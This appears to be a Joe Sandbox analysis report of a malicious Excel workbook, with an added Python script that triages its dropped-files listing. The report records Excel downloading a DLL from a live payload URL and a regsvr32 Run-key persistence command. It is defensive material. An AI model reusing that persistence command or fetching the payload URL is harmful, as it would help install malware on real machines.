• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 92.122.145.220, 52.255.188.83, 52.109.76.68, 52.109.12.22, 20.82.210.154, 2.20.142.209, 2.20.142.210, 20.54.104.15, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.20.56, 20.50.102.62
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/431937/sample/Documents_13134976_1377491379.xlsb

Simulations

Behavior and APIs

Time     | Type            | Description
15:22:03 | API Interceptor | 9x Sleep call for process: regsvr32.exe modified
15:22:35 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
15:22:43 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB

Joe Sandbox View / Context

IPs

Match         | Associated Sample Name / URL | Detection | Context
18.117.84.120 | sample.ocx                   | malicious |

Domains

No context

ASN

Match                          | Associated Sample Name / URL                                       | Detection | Context
AS-26496-GO-DADDY-COM-LLC (US) | Import Custom Duty invoice & its clearance documents.exe           | malicious | 184.168.131.241
MIT-GATEWAYS (US)              | sample.ocx                                                         | malicious | 18.117.84.120

JA3 Fingerprints

Match                            | Associated Sample Name / URL | Detection | Context
8916410db85077a5460817142dcbc8de | sample.ocx                   | malicious | 18.117.84.120
37f463bf4616ecd445d4a1937da06e19 | audit-367497006.xlsb         | malicious | 107.180.50.232

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll | sample.ocx | | malicious |
C:\Users\user\iepfusn.dll | sample.ocx | | malicious |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll | sample.ocx | | malicious |

The payload DLL is therefore recorded at three paths: the IE download cache entry rtdsgfe[1].dll that EXCEL.EXE retrieved (listed in full below), a copy in %TEMP% and a copy placed directly under the user profile root as C:\Users\user\iepfusn.dll. All three matched the previously analysed sample sample.ocx; the SHA 256 and Context columns are empty in this view.

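The listing that follows uses a flat "Field:value" record layout and, at a glance, gives the same "Encrypted: true" weight to a compressed cabinet as a real packed payload. The script below is an added example (not code from the Joe Sandbox report or from Joe Security) that parses that layout and applies the checks an analyst makes by hand: an Office process writing or downloading a PE, a PE dropped directly under the user profile root, a regsvr32 write into CryptnetUrlCache (normally the Windows CTL refresh), and high entropy that is explained by the container format. The embedded listing is constructed from entries on this page, trimmed to the fields the rules need; the fourth record's process name and the rule thresholds are assumptions, not data from the report.

```python
"""Triage a sandbox 'Created / dropped Files' listing (added example, not report code)."""
import re
from dataclasses import dataclass, field

# Constructed input: three records from this page plus one assumed record
# (iepfusn.dll: the report lists the path but not the writing process).
SAMPLE_LISTING = """\
C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\\Windows\\System32\\regsvr32.exe
File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
Category:dropped
Entropy (8bit):7.995256720209506
C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.MSO\\2FDD9604.png
Process:C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE
File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
Category:dropped
Entropy (8bit):7.973758306371751
C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\OTUW0Q90\\rtdsgfe[1].dll
Process:C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:downloaded
Entropy (8bit):6.709188825960524
C:\\Users\\user\\iepfusn.dll
Process:C:\\Windows\\System32\\regsvr32.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
"""


@dataclass
class DroppedFile:
    path: str
    fields: dict = field(default_factory=dict)


@dataclass
class Finding:
    path: str
    severity: str  # "high", "low" or "info"
    reason: str


SEVERITY_RANK = {"info": 0, "low": 1, "high": 2}
_RECORD_START = re.compile(r"^[A-Za-z]:\\")  # a bare Windows path opens a record
_USER_ROOT = re.compile(r"^C:\\Users\\[^\\]+\\[^\\]+$", re.IGNORECASE)  # C:\Users\<name>\<file>
OFFICE_PROCESSES = ("EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE")
PE_TYPES = ("PE32", "MS-DOS executable")
COMPRESSED_TYPES = ("Microsoft Cabinet", "PNG image", "Zip archive", "gzip")


def parse_listing(text):
    """Split the report text into DroppedFile records.

    Field lines read 'Name:value' with no space after the colon, and the value
    may itself contain a colon (drive letter), so split on the first colon only.
    """
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if _RECORD_START.match(line):
            records.append(DroppedFile(path=line))
        elif ":" in line and records:
            name, value = line.split(":", 1)
            records[-1].fields[name.strip()] = value.strip()
    return records


def triage(rec):
    """Apply the heuristics in priority order and return a single Finding."""
    proc_name = rec.fields.get("Process", "").rsplit("\\", 1)[-1].upper()
    ftype = rec.fields.get("File Type", "")
    entropy = float(rec.fields.get("Entropy (8bit)", "0") or 0)
    is_pe = ftype.startswith(PE_TYPES)

    if is_pe and proc_name in OFFICE_PROCESSES:
        return Finding(rec.path, "high", f"{proc_name} {rec.fields.get('Category', 'wrote')} a PE file")
    if is_pe and _USER_ROOT.match(rec.path):
        return Finding(rec.path, "high", "PE file placed directly under the user profile root")
    if "CRYPTNETURLCACHE" in rec.path.upper() and proc_name == "REGSVR32.EXE":
        return Finding(rec.path, "info",
                       "CryptoAPI CTL/CRL cache write; usually the Windows authroot refresh, "
                       "confirm the URL in the MetaData entry")
    if entropy >= 7.9 and ftype.startswith(COMPRESSED_TYPES):
        return Finding(rec.path, "low",
                       f"entropy {entropy:.2f} is explained by compression ({ftype.split(',')[0]}), not encryption")
    if is_pe:
        return Finding(rec.path, "high", f"PE file written by {proc_name}")
    return Finding(rec.path, "low", "no rule matched")


def triage_listing(text):
    return [triage(rec) for rec in parse_listing(text)]


def worst_severity(findings):
    return max((f.severity for f in findings), key=SEVERITY_RANK.__getitem__, default="info")


if __name__ == "__main__":
    results = triage_listing(SAMPLE_LISTING)
    for f in results:
        print(f"[{f.severity:4}] {f.path}\n       {f.reason}")
    print("overall:", worst_severity(results))
```

Run against the full report text, the script reduces a page of hashes to a short list of findings ordered by what matters: the Office-downloaded PE and the user-root DLL come out as high, the CTL cabinet is marked informational for confirmation against its MetaData URL, and the high-entropy PNGs drop to low rather than masquerading as encrypted payloads.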
Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\regsvr32.exe
File Type: Microsoft Cabinet archive data, 60080 bytes, 1 file
Category: dropped
Size (bytes): 60080
Entropy (8bit): 7.995256720209506
Encrypted: true
SSDEEP: 768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
MD5: 6045BACCF49E1EBA0E674945311A06E6
SHA1: 379C6234849EECEDE26FAD192C2EE59E0F0221CB
SHA-256: 65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
SHA-512: DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
Malicious: false
Note: the cabinet holds authroot.stl (visible in the preview) and the matching MetaData entry below records its download from ctldl.windowsupdate.com. This is the Windows trusted-root CTL refresh that CryptoAPI performs during certificate chain building in the regsvr32 process, not attacker content. "Encrypted: true" is the report's entropy heuristic; a compressed cab scores close to 8 bits per byte without being encrypted.
                                                                                                                                                      Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\regsvr32.exe
File Type: data
Category: modified
Size (bytes): 328
Entropy (8bit): 3.132472625894721
Encrypted: false
SSDEEP: 6:kKgy3Pse8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:4Ks8kPlE99SNxAhUe3OMx
MD5: B84815C12C603EC6FB8D1EDA4CA29530
SHA1: CD18E3BC8FCFB385C1225EF5ED0FCF1BD9DF0434
SHA-256: 961CA06C24F3E4B504765841EFB908C623E99B0EC81EBB6804928909F4360E52
SHA-512: 7771C7B0CC1743F21C13270B0B8390410E1BBD9BB849F9DF045F5A9976B99A169328F257CD09403420C24B62275F332CE54909F8603970F07C71C90501984D2F
Malicious: false
Preview: p...... .........<..~]..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
The preview is UTF-16 text rendered one byte per character; decoded, it contains the source URL http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab followed by the string "090e6cfe34cd71:0".
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2CA63FBD-E4D0-4324-9237-CB578953FC60
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134915
Entropy (8bit): 5.369271958078095
Encrypted: false
SSDEEP: 1536:lcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:REQ9DQW+zAXOe
MD5: 76B550BC14095A4AFBB5E04BE5F42175
SHA1: 2A74379C0333997DFED5BB5F7BDB7F707BAF68E4
SHA-256: 7F1E14B77DF7F3FCEB0C34441CA6F6A68288706308BF5B072FAE111AF6BE0817
SHA-512: 41056D2FD4A84E050F7EDC8F962B02C093AD02F3B2B8E410F424A6E155672AF6BA67D21579EC5B0BF6A56F9E8B71B2B0035C5E6B822B78072D1EB2DCBCA3E94F
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-09T13:21:51">.. Build: 16.0.14207.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2FDD9604.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 9924
Entropy (8bit): 7.973758306371751
Encrypted: false
SSDEEP: 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
MD5: B34FB4F2F0F9E70B72BA3AFD028CD97C
SHA1: C6868336F78DEA1E718965DF3341039581DB5B5A
SHA-256: 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
SHA-512: 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
Malicious: false
                                                                                                                                                      Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3DB5784F.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 6177
Entropy (8bit): 7.959095006853368
Encrypted: false
SSDEEP: 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
MD5: C7ED6FC355D8632DB1464BE3D56BF5CC
SHA1: 615484A338922DDF00B903CFA48060AD60D70207
SHA-256: 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
SHA-512: FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
Malicious: false
                                                                                                                                                      Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5E6A3635.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 5744
Entropy (8bit): 7.966496386988271
Encrypted: false
SSDEEP: 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
MD5: 9AD30E24270C495AE68EAF3A1EEECBFB
SHA1: 8642D256E7FFBEF5804A2D2220A1FE475A99DC36
SHA-256: 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
SHA-512: EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
Malicious: false
                                                                                                                                                      Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\682ADEB2.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 956
Entropy (8bit): 7.683552542542939
Encrypted: false
SSDEEP: 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
MD5: 32C83607A5C98C5A634278E5AED3AD61
SHA1: EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
SHA-256: 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
SHA-512: AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
Malicious: false
                                                                                                                                                      Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]*....@.-.L..G.....Q."..%fb.Z*.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\86406406.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 23989
Entropy (8bit): 7.989754044300238
Encrypted: false
SSDEEP: 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
MD5: 839795652A8FE78F26F4D86D757ABDE8
SHA1: 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
SHA-256: 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
SHA-512: E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
Malicious: false
                                                                                                                                                      Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: downloaded
Size (bytes): 205312
Entropy (8bit): 6.709188825960524
Encrypted: false
SSDEEP: 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
MD5: 28193BA741232F91101849F606FA8419
SHA1: 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
SHA-256: 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
SHA-512: 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 6%
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: sample.ocx, Detection: malicious
IE Cache URL: https://tpfcu.com/getfile.php
C:\Users\user\AppData\Local\Temp\18720000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 80566
Entropy (8bit): 7.893302821449264
Encrypted: false
SSDEEP: 1536:Xelem3l7eO+dRRVnyY7lMVGoIahaDHTU6hryF70cAeWvijWGHc:bol7eO6RSY72sTU2yF70cAijW2c
MD5: 5138B6C608292E4C867FC32717C1CF59
SHA1: 836E1C79573D2D8F2E5FCED81BDCA22EEE921EF1
SHA-256: F04037BBF157BEAF7297874FD3700B1059E20B1E6FBF199C61F2B1E112E660C7
SHA-512: 43AF1CC70CD407BBB7BD1B78B98F1054A85A44C96DDAEA6B1AA3AA2D5D0A943659D445D8566010CE5FB177C2597A57FEEA27D5440B8A8D285E2BD5891A31C67C
Malicious: false
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll
Process: C:\Windows\System32\regsvr32.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 205312
Entropy (8bit): 6.709188825960524
Encrypted: false
SSDEEP: 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
MD5: 28193BA741232F91101849F606FA8419
SHA1: 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
SHA-256: 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
SHA-512: 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 6%
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: sample.ocx, Detection: malicious
C:\Users\user\Desktop\~$Documents_13134976_1377491379.xlsb
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.6081032063576088
Encrypted: false
SSDEEP: 3:RFXI6dtt:RJ1
MD5: 7AB76C81182111AC93ACF915CA8331D5
SHA1: 68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256: 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512: A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious: true
Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C:\Users\user\iepfusn.dll
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 205312
Entropy (8bit): 6.709188825960524
Encrypted: false
SSDEEP: 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
MD5: 28193BA741232F91101849F606FA8419
SHA1: 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
